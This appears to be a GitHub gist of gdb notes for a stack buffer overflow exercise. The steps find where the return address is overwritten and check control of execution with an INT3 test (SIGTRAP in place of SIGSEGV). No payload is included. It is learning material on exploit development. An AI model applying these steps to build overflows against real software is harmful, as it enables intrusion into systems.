You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Disassemble the main function to find the ret(32)/retq(64 aka return quad) instruction
(gdb) disassemble main
Create a break point when the main function returns
(gdb) break *0x0...
Define a hook-stop macro
(gdb) define hook-stop
Setup the hook
# Display the current instruction which will be executed next $eip (32) / $rip (64)
> x/1i $eip
> x/1i $rip
# Examine 8 words as hex from the stack $esp(32)/$rsp(64) and x/8wx(32)/x8gx(64)
> x/8wx $esp
> x/8gx $rsp
# Close the hook stop
> end
Execute it
(gdb) r
The code should break at out breakpoint so let's step into the return
(gdb) si
Run the code with the alphabet
(gdb) r < alphabet
Step into what should be a segmentation fault
(gdb) si
Inspect the stack register $esp(32)/$rsp(64)
(gdb) x/s $esp
(gdb) x/s $rsp
Run it again
(gdb) r
Step into our return
(gdb) si
Inspect the registers
(gdb) info registers
Update the script with a INT3 and then run
(gdb) r < exploit
Continue the code which should show us telling the instructor to jump to the stack, hitting an int3 and if all worked you will have a SIGTRAP instead of a SIGSEGV
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
